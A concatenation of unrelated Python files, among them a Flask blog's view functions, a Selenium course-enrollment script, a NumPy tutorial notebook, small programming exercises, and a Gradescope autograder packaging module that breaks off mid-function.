(one_period_label.max() - one_period_label.mean()) * P
thr = max(thr, 1)
one_period_label = np.int64(one_period_label >= thr)
sequence_label.append(one_period_label)
sub_net.append(sequence_net)
node_feature.append(sequence_feature)
edge_feature.append(sequence_edge)
label.append(sequence_label[0])
print('dup dict len:', len(dup_dict.values()))
if len(sub_net) != 0:
print('st-graphs num:{}, node_feat_list:{}, '
'\n edge_feat_list:{}, label_list:{}'.format(len(sub_net), len(node_feature), len(edge_feature), len(label)))
with open(save_path[0], 'wb') as f:
pickle.dump(sub_net, f)
with open(save_path[1], 'wb') as f:
pickle.dump(node_feature, f)
with open(save_path[2], 'wb') as f:
pickle.dump(edge_feature, f)
with open(save_path[3], 'wb') as f:
pickle.dump(label, f)
def main():
net_complete()
print('done')
if __name__ == '__main__':
main()
|
from django.db import models
from django.contrib.auth.models import AbstractUser
class MyCustomUser(AbstractUser):
first_name = models.CharField(max_length=25)
last_name = models.CharField(max_length=25)
|
"""added encode_commands flag
Revision ID: eef5682e45eb
Revises: c789ecdb563c
Create Date: 2017-04-12 15:51:49.935504
"""
# revision identifiers, used by Alembic.
revision = 'eef5682e45eb'
down_revision = 'c789ecdb563c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('sites', sa.Column('encode_commands', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('sites', 'encode_commands')
### end Alembic commands ### |
"""
integer is 4byte or 32 bits
This works for negative numbers too!
"""
def convert(n):
i = 31
while i >= 0:
k = n >> i
if k & 1 > 0:
print("1",end="")
else:
print("0",end="")
i -= 1
# orignal number = 2 4
# maskA = -16 maskB = 1
# final mask = -15 n after and with mask = 0 m after i-1 left shift = 8
# 8
convert(4)
print()
convert(2)
print()
convert(2)
print()
print("========================================================")
convert(6)
print()
convert(3)
print()
convert(2)
|
class Solution:
def check(self, nums: List[int]) -> bool:
min_val = min(nums)
size = len(nums)
offset = nums.index(min_val)
if(offset == 0):
for i in range(size-1,-1,-1):
if(nums[i] == min_val):
offset = i
else:
break
for i in range(1,size):
l = (i + offset - 1) % size
r = (i + offset) % size
if(nums[l] > nums[r]):
return False
return True
|
import sys
import time
from URLS import Base
import mail_stuff
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
register_add_drop ='#PG_MYMENU_HMPG_Data > div >\
table > tbody > tr:nth-child(1) > td > table > tbody > tr:nth-child(6) >\
td > table > tbody > tr:nth-child(2) > td:nth-child(3) > table > tbody >\
tr:nth-child(2) > td > table > tbody > tr:nth-child(7) > td:nth-child(2) > a'
flag = False
browser = webdriver.Chrome()
browser.get(Base.url)
browser.find_element_by_id('userid').send_keys(Base.uid)
browser.find_element_by_id('pwd').send_keys(Base.pwd + Keys.RETURN)
try:
element = WebDriverWait(browser, 10).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, register_add_drop)))
element.click()
except TimeoutException:
print('failed')
browser.close()
sys.exit(0)
browser.switch_to_frame(browser.find_element_by_xpath('//*[@id="ptifrmcontent"]/div/iframe'))
while not flag:
# add classes button to refresh
browser.find_element_by_xpath('//*[@id="win0divDERIVED_SSTSNAV_SSTS_NAV_SUBTABS"]/div/table/tbody/tr[2]/td[5]/a').click()
# get contents of shopping cart:
entries = browser.find_elements_by_xpath('//*[@id="SSR_REGFORM_VW$scroll$0"]/tbody/tr') # grabs table
# for i in range(2,len(entries)): # 2 because first 2 rows are rubbish
# entries[i].click()
for i in range(0,len(entries)-2):
status = browser.find_element_by_xpath('//*[@id="win0divDERIVED_REGFRM1_SSR_STATUS_LONG${}"]/div/img'.format(i))
status.click()
if 'CLOSED' not in status.get_attribute("src"):
flag = True
mail_stuff.send_mail()
#proceed to step 2 of 3 button
browser.find_element_by_id('DERIVED_REGFRM1_LINK_ADD_ENRL$82$').click()
try:
element = WebDriverWait(browser, 10).until(
EC.visibility_of_element_located((By.ID, 'DERIVED_REGFRM1_SSR_PB_SUBMIT')))
element.click()
except TimeoutException:
print('failed')
browser.close()
sys.exit(0)
# get into next iframe again -- NOT NEEDED
# browser.switch_to_frame(browser.find_element_by_xpath('//*[@id="ptifrmtgtframe"]'))
# finish !
# browser.find_element_by_id('DERIVED_REGFRM1_SSR_PB_SUBMIT').click()
browser.close()
sys.exit()
# search button
browser.find_element_by_id('DERIVED_REGFRM1_SSR_PB_SRCH').click()
# return to shopping cart
browser.find_element_by_xpath('//*[@id="CLASS_SRCH_WRK2_SSR_PB_CLOSE"]').click()
''' START BROWSER METHODS:
find_element
find_element_by_id
find_element_by_name
find_element_by_tag_name
find_element_by_class_name
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_css_selector
find_element_by_xpath
find_elements
find_elements_by_id
find_elements_by_name
find_elements_by_tag_name
find_elements_by_class_name
find_elements_by_link_text
find_elements_by_partial_link_text
find_elements_by_css_selector
find_elements_by_xpath
current_url
get_cookies
set_window_size
error_handler
close
set_page_load_timeout
delete_cookie
get_screenshot_as_file
desired_capabilities
maximize_window
page_source
execute_async_script
set_window_position
switch_to_frame
add_cookie
_switch_to
window_handles
start_client
log_types
delete_all_cookies
execute
set_script_timeout
get_window_size
get_cookie
orientation
get_screenshot_as_png
switch_to_window
get_window_position
switch_to_active_element
_is_remote
execute_script
command_executor
_wrap_value
file_detector
service
switch_to_alert
get
_file_detector
capabilities
refresh
mobile
forward
create_web_element
application_cache
create_options
file_detector_context
session_id
back
quit
launch_app
stop_client
current_window_handle
start_session
switch_to
save_screenshot
name
get_screenshot_as_base64
title
w3c
implicitly_wait
get_log
_unwrap_value
_web_element_cls
_mobile
switch_to_default_content
END BROWSER METHODS: ''' |
#!/usr/bin/env python
# coding: utf-8
# In[72]:
#actualInput = "8 4 7 7 8 1 -7 3 2 0 2 1 0 -2 2 -3 -3 1 0 6 2 5 3 1"
actualInput = "10 8 4 0 0 9 0 0 10 1 0 1 1 0 2" # input from user as a string
temporaryList = list(actualInput.split(" "))
inputString = []
for num in temporaryList:
inputString.append(int(num)) # convert string into a list of integer numbers
count = 0
R = inputString[0]
D = inputString[1]
for i in range(3,len(inputString)-2,3): # cycles through the coordinates and radii of each sausage
x = inputString[i] # local variables for each sausage coordinate
y = inputString[i+1]
r = inputString[i+2]
dist = distance(x,y) # calculate distance between each sausage and center of pizza
if ( ((dist-r) > (R-D) ) and ((dist-r) < R) ): # check if sausage is COMPLETELY on crust AND still on the pizza
count += 1 # counter increments
print(count) # prints/returns the number of sausages on the crust
# In[60]:
from math import sqrt
def distance (x,y):
return sqrt((x*x)+(y*y)) # calculates distance between a point and origin (0,0)
# In[ ]:
|
# ########### 说明 ########## #
# 这是接入方处理环境的入口文件,需要将环境信息在这里进行标准化,方便 base_class 类中,对环境信息进行获取。
# 需要注意的是必须保留三个方法: get_env_list、get_mysql_option、get_application_host
# 对于新扩展的环境信息配置请单独编写 get方法,并在base_class中调用
# 建议的配置获取方案:
# ############################ #
class EnvRouter():
# ################### 自定义代码区域 ################### #
def __init__(self):
"""
获取配置对象,
数据库配置结构标准Dict:
todo: 开发人员需要根据组织下测试环境的各自情况,将配置进行完善。
"""
pass
def get_env_list(self):
"""
todo: 获取所有的环境名称,开发人员需要根据组织下的测试环境进行完善。
"""
return ['env1', 'env2']
def get_option_demo(self, env_name, param1):
"""
获取配置的 demo代码
"""
if True:
return '获取配置内容'
else:
raise Exception("【{}】环境的XX【{}】demo配置不存在".format(env_name, param1))
# ################### 自定义代码区域 END ################### #
# ################### 以下是固定方法,不允许删除,因方法已经在基础调用中被引用 ################### #
def get_mysql_option(self, env_name, database_name):
"""
通过环境名称env_name,获取该环境下的 mysql_option 配置
"""
print(env_name, database_name)
if True:
return True, {
"host": "0.0.0.0",
"port": "3301",
"user": "user",
"passwd": "pwd"
}
else:
return False, "【{}】环境的数据库【{}】配置不存在".format(env_name, database_name)
def get_application_host(self, env_name, application_name):
"""
通过环境名称env_name,获取该环境下的 application_host_options 配置
"""
if True:
return 'http://www.baidu.com'
else:
raise Exception("【{}】环境的应用【{}】域名不存在".format(env_name, application_name))
|
# f(x) = 2x + 1
def f1(x):
return (2 * x) + 1
# f(x) = x^2 + 2x + 1
def f2(x):
return (x ** 2) + (2 * x) + 1
print(f1(10))
print(f2(10)) |
# coding=utf-8
from flask import render_template, request, current_app, redirect, url_for, flash, jsonify
from flask_login import login_required, login_user, logout_user, current_user
from . import main
from .forms import PostForm, EditForm, CommentForm, LoginForm
from .. import db
from ..models import Category, Post, Label, Comment, User, LikePost
from ..decorators import dexter_required
@main.route('/', methods=['GET', 'POST'])
def index():
categories = Category.query.all()
labels = Label.query.all()
page = request.args.get('page', 1, type=int)
pagination = Post.query.order_by(Post.timestamp.desc()).paginate(
page, per_page=current_app.config['POSTS_PER_PAGE'], error_out=False)
posts = pagination.items
# 登录表单
loginform = LoginForm()
if loginform.validate_on_submit():
user = User.query.filter_by(username=loginform.username.data).first()
if user is not None and user.verify_password(loginform.password.data):
login_user(user, loginform.remember_me.data)
return redirect(url_for('main.index'))
flash('用户不存在或者密码填写错误!')
return render_template('index.html', posts=posts, pagination=pagination, loginform=loginform, categories=categories
, labels=labels)
@main.route('/category/<tag>', methods=['GET'])
def category(tag):
categories = Category.query.all()
category = Category.query.filter_by(tag=tag).first_or_404()
page = request.args.get('page', 1, type=int)
pagination = category.posts.order_by(Post.timestamp.desc()).paginate(
page, per_page=current_app.config['POSTS_PER_PAGE'], error_out=False)
posts = pagination.items
# 登录表单
loginform = LoginForm()
if loginform.validate_on_submit():
user = User.query.filter_by(username=loginform.username.data).first()
if user is not None and user.verify_password(loginform.password.data):
login_user(user, loginform.remember_me.data)
return redirect(url_for('main.category', tag=tag))
flash('用户不存在或者密码填写错误!')
return render_template('category.html', category=category, posts=posts, pagination=pagination, loginform=loginform
, categories=categories)
@main.route('/write', methods=['GET', 'POST'])
@login_required
@dexter_required
def write():
categories = Category.query.all()
form = PostForm()
loginform = LoginForm()
if form.validate_on_submit():
labels = []
tag = form.category.data
labels_article = form.labels.data.split(',')
for l in labels_article:
label = Label.query.filter_by(label=l).first()
if label is None:
label = Label(label=l, count=0)
db.session.add(label)
db.session.commit()
labels.append(label)
post = Post(title=form.title.data,
summery=form.summery.data,
body=form.body.data,
category=Category.query.filter_by(tag=tag).first(),
labels=labels,
comment_num=0,
like_num=0)
# 增加一篇文章的同时将其所在的 Category 的文章数 +1
post.category.count += 1
db.session.add(post.category)
db.session.commit()
# 增加一篇文章的同时将其所包含的的 Label 的文章数 +1
for label in labels:
label.count += 1
db.session.add(label)
db.session.commit()
db.session.add(post)
db.session.commit()
return redirect(url_for('main.post', id=post.id))
return render_template("write.html", form=form, loginform=loginform, categories=categories)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@dexter_required
def edit(id):
categories = Category.query.all()
post = Post.query.get_or_404(id)
form = EditForm()
loginform = LoginForm()
if form.validate_on_submit():
labels = []
labels_article = form.labels.data.split(',')
for l in labels_article:
label = Label.query.filter_by(label=l).first()
if label is None:
label = Label(label=l, count=0)
db.session.add(label)
db.session.commit()
# 此时的 label 是 Label 对象
labels.append(label)
post.title = form.title.data
post.summery = form.summery.data
post.body = form.body.data
# 在更新 post 的 label 之前先分出修改之前已经有的 Label 和修改后的 label
# 这样在更新该 label 的文章数仅更新修改过的 Label 的文章数
# 避免发生同一篇文章在一个 Label 上算成两篇甚至多篇文章这种情况
# 1.修改文章时增加了 Label
for label in labels:
if label not in post.labels:
label.count += 1
db.session.add(label)
db.session.commit()
# 2.修改文章时删除了某些 Label
# 遍历未修改之前的 Label
for label in post.labels:
if label not in labels:
label.count -= 1
db.session.add(label)
db.session.commit()
# 更新 post 的 label
post.labels = labels
db.session.add(post)
db.session.commit()
return redirect(url_for('main.post', id=post.id))
# 显示已有的信息
form.title.data = post.title
form.summery.data = post.summery
form.body.data = post.body
str = ''
for label in post.labels:
str += label.label
str += ','
form.labels.data = str
return render_template("edit.html", form=form, category=post.category.tag, loginform=loginform
, categories=categories)
@main.route('/delete/<int:id>', methods=['GET'])
@login_required
@dexter_required
def delete_article(id):
post = Post.query.get_or_404(id)
# 删除一篇文章的同时将其所在的 Category 的文章数 -1
post.category.count -= 1
db.session.add(post.category)
db.session.commit()
# 删除一篇文章的同时将其所包含的 Label 的文章数 -1
for label in post.labels:
label.count -= 1
db.session.add(label)
db.session.commit()
# 删除一篇文章的同时将其所有的 Comment
for comment in post.comments:
db.session.delete(comment)
db.session.commit()
db.session.delete(post)
db.session.commit()
return redirect(url_for('main.index'))
@main.route('/delete_comment/<int:id>', methods=['GET'])
@login_required
@dexter_required
def delete_comment(id):
comment = Comment.query.get_or_404(id)
# 保留comment 所在的 Post 的 id 方便重定向
id = comment.post.id
# 删除一个评论的同时将其所在的 Post 的评论数 -1
comment.post.comment_num -= 1
db.session.add(comment.post)
db.session.commit()
db.session.delete(comment)
db.session.commit()
return redirect(url_for('main.post', id=id))
@main.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('main.index'))
@main.route('/like_post')
@login_required
def like_post():
# 通过 url 得到 post_id
post_id = request.args.get('post_id', 0, type=int)
post = Post.query.get_or_404(post_id)
like_post = LikePost(post=post, user=current_user)
db.session.add(like_post)
db.session.commit()
post.like_num += 1
db.session.add(post)
db.session.commit()
return jsonify(likes=post.like_num)
@main.route('/undo_like_post')
@login_required
def undo_like_post():
post_id = request.args.get('post_id', 0, type=int)
post = Post.query.get_or_404(post_id)
like_post = LikePost.query.filter_by(post=post, user=current_user)
db.session.delete(like_post)
db.session.commit()
post.like_num -= 1
db.session.add(post)
db.session.commit()
return jsonify(likes=post.like_num)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
categories = Category.query.all()
form = CommentForm()
loginform = LoginForm()
post = Post.query.get_or_404(id)
# 区别用户是否对该文章点赞
like = False
# 确定用户已经登陆在进行判断,否则为 False
if current_user.is_authenticated:
if LikePost.query.filter_by(post=post, user=current_user).first() is not None:
like = True
page = request.args.get('page', 1, type=int)
pagination = post.comments.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['COMMENTS_PER_POST'], error_out=False)
comments = pagination.items
if form.validate_on_submit():
comment = Comment(comment=form.comment.data, post=post, user=current_user)
# P增加一个评论的同时将评论所在的 post 的评论数 +1
post.comment_num += 1
db.session.add(post)
db.session.commit()
db.session.add(comment)
db.session.commit()
return redirect(url_for('main.post', id=id))
# 登录表单
if loginform.validate_on_submit():
user = User.query.filter_by(username=loginform.username.data).first()
if user is not None and user.verify_password(loginform.password.data):
login_user(user, loginform.remember_me.data)
return redirect(url_for('main.post', id=id))
flash('用户不存在或者密码填写错误!')
return render_template("post.html", post=post, form=form, comments=comments, pagination=pagination
, loginform=loginform, categories=categories, like=like) |
from asyncio import sleep
from time import time
from typing import Callable, Optional
from mobilium_server.utils.exceptions import TimeoutException
async def wait_until_true(action: Callable[[], bool], timeout: int = 30, interval: int = 1,
timeout_message: Optional[str] = None):
end_time = time() + timeout
while time() < end_time:
if action():
return
await sleep(interval)
if timeout_message is None:
timeout_message = "Timeout for {} after {} seconds".format(action.__name__, timeout)
raise TimeoutException(timeout_message)
|
# -*- coding: latin-1 -*-
"""
* Resolução do exercício 5 do capítulo 1.4 (Timothy Sauer. Numerical Analysis. Pearson, 2ª Edição)
*
* Executado como : newton_1.4-11.py
*
* Parâmetros usados para teste:
* python newton_1.4-11.py
*
"""
import sys
from pprint import pprint
from numpy import array, zeros, diag, diagflat, dot,linalg
def sassenfeld(A):
n = len(A)
soma = 0
B = [1] * len(A)
for i in range(n):
j = i
if j != 0:
k = j-1
while k >= 0:
soma = abs(A[i][k])*B[k] + soma
k = k -1
if j != n-1:
k = j+1
while k <n:
soma = abs(A[i][k])*B[k] + soma
k = k+1
B[i] = soma/float(abs(A[i][j]))
if B[i] > 1:
return False
break
soma = 0
return True
def main (argv):
A = array([[10,-1,1],[1,-10,-1],[1,1,-5]])
print "A:"
pprint(A)
bol = sassenfeld(A)
if bol:
print "\n A matriz A é convergente."
else:
print "\n A matriz A não é convergente."
if __name__ == '__main__':
main(sys.argv[1:]) |
#!/usr/bin/env python
# coding: utf-8
# # NumPy
# NumPy is a useful package that can help store and wrangle homogeneous data. This means data that the data are of the same [data type](https://jakevdp.github.io/PythonDataScienceHandbook/02.01-understanding-data-types.html) such as all **floats** or all **integers**.
#
# We strongly recommend working through the ["NumPy Quickstart Tutorial"](https://numpy.org/doc/stable/user/quickstart.html) for a more comprehensive introduction to NumPy. Here, we'll introduce some useful tools using the *NumPy* package to analyze large datasets.
# Before we can use NumPy, we need to import the package. We can also nickname the modules when we import them. The convention is to import `numpy` as `np`.
# In[1]:
# Import packages
import numpy as np
# Use whos 'magic command' to see available modules
get_ipython().run_line_magic('whos', '')
# ## NumPy Arrays
# The basis of the NumPy package is the **array**. A NumPy array is similar to a list of lists or a grid of values. You can create a [NumPy array](https://numpy.org/doc/stable/reference/generated/numpy.array.html) from a list using `np.array()`, by reading in a file, or through functions built into the NumPy package such as such as `arange`, `linspace`, `empty`, which we will discuss later.
# In[2]:
# Create a random list
list1 = [2, 4, 6, 8, 10, 12]
# Store list as a numpy array
array1 = np.array(list1)
print(array1)
# What we have created is a one-dimensional array which is similar to a normal list. NumPy arrays however, can be multidimensional. If we input a list of lists into `np.array()`, the output would be a multidimensional array (i.e a grid/matrix).
# In[3]:
# Create a 2nd random list
list2 = [1, 3, 5, 7, 9, 11]
# Store list of lists as a NumPy array
array1 = np.array([list1, list2])
print(array1)
# ## Accessing attributes of NumPy arrays
# We can return the shape and size of an arry either by looking at the attribute of the array, or by using the `shape()` and `size()` functions. The `shape` attribute returns a tuple for the number of rows and columns of an array. The `size` attribute returns the total number of values stored within an array.
# In[4]:
print('Array1 has a shape of:')
print(array1.shape)
print('\nArray1 has a size of:')
print(array1.size)
# Other attributes that might be of interest are `ndim` and `dtype` which respectively return the number of dimensions of the array and the data types stored in the array. You can see the full list of ndarray attributes in the <a href = "https://numpy.org/doc/stable/reference/arrays.ndarray.html#array-attributes"> NumPy ndarray documentation</a>.
# In[5]:
print('Array1 dimensions:')
print(array1.ndim)
print('\nArray1 contains values of data type:')
print(array1.dtype)
# ## Indexing & Slicing Arrays
# You can index NumPy arrays using `array_name[row,column]` to select a single value. If you omit the column, it will give you the entire row. You can also use `:` for either row or column and it will return all of those values. We will demonstrate by indexing into `array1`.
# In[6]:
# Select the number 6 from our array
print('The value stored in row 1, column 3 is:')
print(array1[0,2])
# Select the 2nd row from our array
print('The values stored in row 2 are:')
print(array1[1])
# You may want to look at a slice of columns or a slice of rows. You can do so using `array(start_index:stop_index)` for either row or columns to select your slice.
# In[7]:
# Print the first 3 columns of each row
print(array1[: ,0:3])
# You can also select multiple specifc columns by inputing a `list` as your `columns`. Lets try to index the first, third, and last column in `array1`.
# In[8]:
# Choose your columns of interest
columns = [0, 2, -1]
print(array1[:, columns])
# We can also change values in an array similar to how we would change values in a list. The syntax we use is `array[row,column] = new_desired_value`.
# In[9]:
# Change the entire first row of array1 to 100
array1[0,:] = 100
print(array1)
# For further explanation of how to index Numpy arrays, please visit the <a href = "https://numpy.org/doc/stable/reference/arrays.indexing.html"> NumPy indexing documentation</a>.
# ## Subsetting
# We can also subet our original array to only include data that meets our criteria. We can think of this as *filtering* the array by applying a condition to our array. The syntax for this would be `new_array = original_array[condition]`.
# In[10]:
# Reassign our original array
array1 = np.array([list1, list2])
# Return values greater than 5 from our array
condition = (array1 > 5)
filtered_array = array1[condition]
print(filtered_array)
# ## Benefits of Using Arrays
# The list of lists format is not wrong per say, but it makes working with the data more difficult. For example, if you were trying to add the numbers of the two lists together, simply adding the lists would only append one list at the end of the other. However, if you add two NumPy arrays together, the values of both arrays will be summed.
# In[11]:
# Add two lists together
list3 = [10, 20, 30, 40]
list4 = [20, 40, 60, 80]
print(list3 + list4)
print('\n')
# Add two arrays together
array2 = np.array([10, 20, 30, 40])
array3 = np.array([20, 40, 60, 80])
print(array2 + array3)
# Alternitavely, you can use the `sum()` method to add all values in an array together. You can also specify whether you want to sum the values across rows or columns in a grid/matrix. If you specify you want to sum values in rows or columns, the output will be an array of the sums.
# In[12]:
# Create a 2 by 3 array
array4 = np.array([[5, 10], [15, 20], [25, 30]])
print('array4:')
print(array4)
print('\n')
# Sum all values in array
print('Array sum')
print(array4.sum())
print('\n')
# Sum the values across columns
print('Column sums')
print(array4.sum(axis = 0))
print('\n')
# Sum the values across rows
print('Row sums')
print(array4.sum(axis = 1))
# For a full list of array methods, please visit the <a href = "https://numpy.org/doc/stable/reference/arrays.ndarray.html#array-methods"> NumPy array methods documentation</a>. You can also visit the <a href = ""> NumPy Reference</a> for more information on functions, modules, and objects in NumPy.
# ## NumPy also includes some very useful array generating functions:
#
# * `arange`: like `range` but gives you a useful NumPy array, instead of an interator, and can use more than just integers)
# * `linspace` creates an array with given start and end points, and a desired number of points
# * `logspace` same as linspace, but in log.
# * `random` can create a random list (there are <a href="https://docs.scipy.org/doc/numpy-1.14.0/reference/routines.random.html">many different ways to use this</a>)
# * `concatenate` which can concatenate two arrays along an existing axis [<a href="https://docs.scipy.org/doc/numpy/reference/generated/numpy.concatenate.html">documentation</a>]
# * `hstack` and `vstack` which can horizontally or vertically stack arrays
#
# Whenever we call these, we need to use whatever name we imported `numpy` as (here, `np`). We will demonstrate some of these functions below. For a full list of funtions used to create arrays, please visit the <a href = "https://numpy.org/doc/stable/reference/routines.array-creation.html"> NumPy array creation documentaion</a>.
# In[13]:
# When using linspace, both end points are included
print(np.linspace(0,147,10))
# In[14]:
# First array is a list of 10 numbers that are evenly spaced,
# and range from exactly 1 to 100
first_array = np.linspace(1,100, 10)
# Second row is a list of 10 numbers that begin
# at 0 and are exactly 10 apart
second_array = np.arange(0,100,10)
print(first_array)
print(second_array)
# In[15]:
# Create an array that has two rows
# First row should be 'first_array'
# Second row should be 'second_array'
big_array = np.vstack([first_array, second_array])
print(big_array)
# Numpy also has built in methods to save and load arrays: `np.save()` and `np.load()`. Numpy files have a .npy extension. See full documentation <a href="https://docs.scipy.org/doc/numpy/reference/generated/numpy.save.html">here</a>.
# In[16]:
# Save method takes arguments 'filename' and then 'array':
np.save('big_array',big_array)
# In[17]:
my_new_matrix = np.load('big_array.npy')
print(my_new_matrix)
# ## Additional Resources
# See the [Python Data Science Handbook](https://jakevdp.github.io/PythonDataScienceHandbook/02.00-introduction-to-numpy.html) for a more in depth exploration of NumPy, and of course, <a href = "https://numpy.org/doc/stable/contents.html#numpy-docs-mainpage">the original documentation</a>.
# In[ ]:
|
"""
Utilities for gradescope autograding.
"""
import os
import json
from fractions import Fraction
from zipfile import ZipFile, ZIP_DEFLATED
from . import __version__ as ZUCCHINI_VERSION
from .constants import ASSIGNMENT_CONFIG_FILE, ASSIGNMENT_FILES_DIRECTORY
from .utils import ConfigDictMixin, ConfigDictNoMangleMixin, \
datetime_from_string, recursive_get_using_string
class GradescopeMetadata(object):
"""
Parse the metadata as described in:
https://gradescope-autograders.readthedocs.io/en/latest/submission_metadata/
"""
_ATTRS = [
('student_name', 'users.0.name', str),
('submission_date', 'created_at', datetime_from_string),
('due_date', 'users.0.assignment.due_date', datetime_from_string),
# The nested int(float(..)) deal is because int('100.0')
# explodes
('total_points', 'assignment.outline.0.weight',
lambda pts: int(float(pts))),
]
def __init__(self, json_dict):
for attr, key, type_ in self._ATTRS:
val = recursive_get_using_string(json_dict, key)
setattr(self, attr, type_(val))
@classmethod
def from_json_path(cls, json_path):
with open(json_path, 'r', errors='ignore') as json_fp:
return cls(json.load(json_fp))
class GradescopeAutograderTestOutput(ConfigDictNoMangleMixin, ConfigDictMixin):
"""
Output of a single test in Gradescope JSON.
"""
def __init__(self, name=None, score=None, max_score=None, output=None):
self.name = name
self.score = score
self.max_score = max_score
self.output = output
class GradescopeAutograderOutput(ConfigDictNoMangleMixin, ConfigDictMixin):
"""
Hold Gradescope Autograder output as described in
https://gradescope-autograders.readthedocs.io/en/latest/specs/#output-format
"""
def __init__(self, score=None, tests=None, extra_data=None):
self.score = score
self.tests = [GradescopeAutograderTestOutput.from_config_dict(test)
for test in tests] if tests is not None else None
self.extra_data = extra_data
def to_config_dict(self, *args):
dict_ = super(GradescopeAutograderOutput, self).to_config_dict(*args)
if dict_.get('tests', None):
dict_['tests'] = [test.to_config_dict() for test in dict_['tests']]
return dict_
@staticmethod
def _two_decimals(grade, frac):
"""Convert a fraction to string with two decimal points"""
return '{:.02f}'.format(grade.to_float(frac))
@classmethod
def from_grade(cls, grade):
"""
Convert a grading_manager.Grade to Gradescope JSON.
"""
score = grade.score()
tests = []
# Store the component grades in the extra_data field
extra_data = {'component_grades': grade.serialized_component_grades()}
computed_grade = grade.computed_grade()
# Add penalties
for penalty in computed_grade.penalties:
if penalty.points_delta != 0:
# Hack: Display -37 as 0/37 and +37 as 37/37
fake_max_score = cls._two_decimals(
grade, abs(penalty.points_delta))
fake_score = cls._two_decimals(grade, Fraction(0)) \
if penalty.points_delta < 0 else fake_max_score
test = GradescopeAutograderTestOutput(
name=penalty.name,
score=fake_score,
max_score=fake_max_score)
tests.append(test)
# Add actual test results
for component in computed_grade.components:
if component.error:
test = GradescopeAutograderTestOutput(
name=component.name,
score=cls._two_decimals(grade, component.points_got),
max_score=cls._two_decimals(
grade, component.points_possible),
output='{}\n{}'.format(component.error,
component.error_verbose or ''))
tests.append(test)
else:
for part in component.parts:
if part.deductions:
deductions = 'Deductions: {}\n\n'.format(
', '.join(part.deductions))
else:
deductions = ''
test = GradescopeAutograderTestOutput(
name='{}: {}'.format(component.name, part.name),
score=cls._two_decimals(grade, part.points_got),
max_score=cls._two_decimals(
grade, part.points_possible),
output=deductions + part.log)
tests.append(test)
return cls(score=score, tests=tests, extra_data=extra_data)
def to_json_stream(self, fp):
json.dump(self.to_config_dict(), fp)
SETUP_SH = r'''#!/bin/bash
# THIS FILE WAS GENERATED BY ZUCCHINI
set -e
cd /autograder/source
# Prevent apt from prompting for input and hanging the build
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y python3 python3-pip python3-wheel {prereqs}
pip3 install {pip_install_arg}
{extra_setup_commands}
'''
RUN_AUTOGRADER = r'''#!/bin/bash
# THIS FILE WAS GENERATED BY ZUCCHINI
set -e
set -o pipefail
cd /autograder/source
zucc flatten /autograder/submission
{grade_cmd_prefix}zucc grade-submission /autograder/submission \
| zucc gradescope bridge /autograder/submission_metadata.json \
> /autograder/results/results.json
'''
RUN_GRAPHICAL_SH = r'''#!/bin/bash
cat >xorg.conf <<'EOF'
# This xorg configuration file is meant to be used by xpra
# to start a dummy X11 server.
# For details, please see:
# https://xpra.org/Xdummy.html
Section "ServerFlags"
Option "DontVTSwitch" "true"
Option "AllowMouseOpenFail" "true"
Option "PciForceNone" "true"
Option "AutoEnableDevices" "false"
Option "AutoAddDevices" "false"
EndSection
Section "Device"
Identifier "dummy_videocard"
Driver "dummy"
Option "ConstantDPI" "true"
VideoRam 192000
EndSection
Section "Monitor"
Identifier "dummy_monitor"
HorizSync 5.0 - 1000.0
VertRefresh 5.0 - 200.0
Modeline "1024x768" 18.71 1024 1056 1120 1152 768 786 789 807
EndSection
Section "Screen"
Identifier "dummy_screen"
Device "dummy_videocard"
Monitor "dummy_monitor"
DefaultDepth 24
SubSection "Display"
Viewport 0 0
Depth 24
Modes "1024x768"
Virtual 1024 768
EndSubSection
EndSection
EOF
/usr/lib/xorg/Xorg -noreset -logfile ./xorg.log -config ./xorg.conf :69 \
>/dev/null 2>&1 &
xorg_pid=$!
export DISPLAY=:69
"$@"
exitcode=$?
kill "$xorg_pid" || {
printf 'did not kill Xorg!\n' >&2
exit 1
}
exit $exitcode'''
class GradescopeAutograderZip(object):
"""
Generates a Gradesope autograder zip file from which Gradescope
generates a Docker image for grading.
"""
def __init__(self, path='.', prerequisites=None, extra_setup_commands=None,
needs_display=False, wheel_path=None):
self.path = path
self.prerequisites = prerequisites or []
self.extra_setup_commands = extra_setup_commands or []
self.needs_display = needs_display
self.wheel_path = wheel_path
# Need this for
if self.needs_display:
prerequisites.append('xserver-xorg-video-dummy')
def _relative_path(self, abspath):
"""
Convert an absolute path to an assignment file to a path
relative to self.path.
"""
return os.path.relpath(abspath, self.path)
def _real_path(self, relpath):
"""
Convert a relative path to an assignment file to an absolute
path.
"""
return os.path.join(self.path, relpath)
def _write_file(self, file_path, zipfile, real_path=None):
"""
Add a file to the generated zip file. file_path is the
destination path in the .zip file. If real_path is not provided,
it will be self.path/file_path.
"""
if real_path is None:
real_path = self._real_path(file_path)
zipfile.write(real_path, file_path)
def _write_string(self, string, path, zipfile):
"""
Add a file to the generated zip file. file_path should be relative to
self.path.
"""
zipfile.writestr(path, string)
def _write_dir(self, dir_path, zipfile):
"""
Recursively add a directory to the generated zip file. dir_path
should be relative to self.path.
"""
real_path = self._real_path(dir_path)
for dirpath, _, filenames in os.walk(real_path):
for filename in filenames:
relpath = self._relative_path(os.path.join(dirpath, filename))
self._write_file(relpath, zipfile)
def write_zip(self, file):
"""
Write the autograder .zip to file. If file is a file-like
object, write it there, otherwise it should be a string
designating the destination path.
"""
with ZipFile(file, 'w', ZIP_DEFLATED) as zipfile:
self._write_file(ASSIGNMENT_CONFIG_FILE, zipfile)
grading_files = self._real_path(ASSIGNMENT_FILES_DIRECTORY)
if os.path.exists(grading_files):
self._write_dir(ASSIGNMENT_FILES_DIRECTORY, zipfile)
if self.needs_display:
self._write_string(RUN_GRAPHICAL_SH, 'run_graphical.sh',
zipfile)
grade_cmd_prefix = 'bash run_graphical.sh '
else:
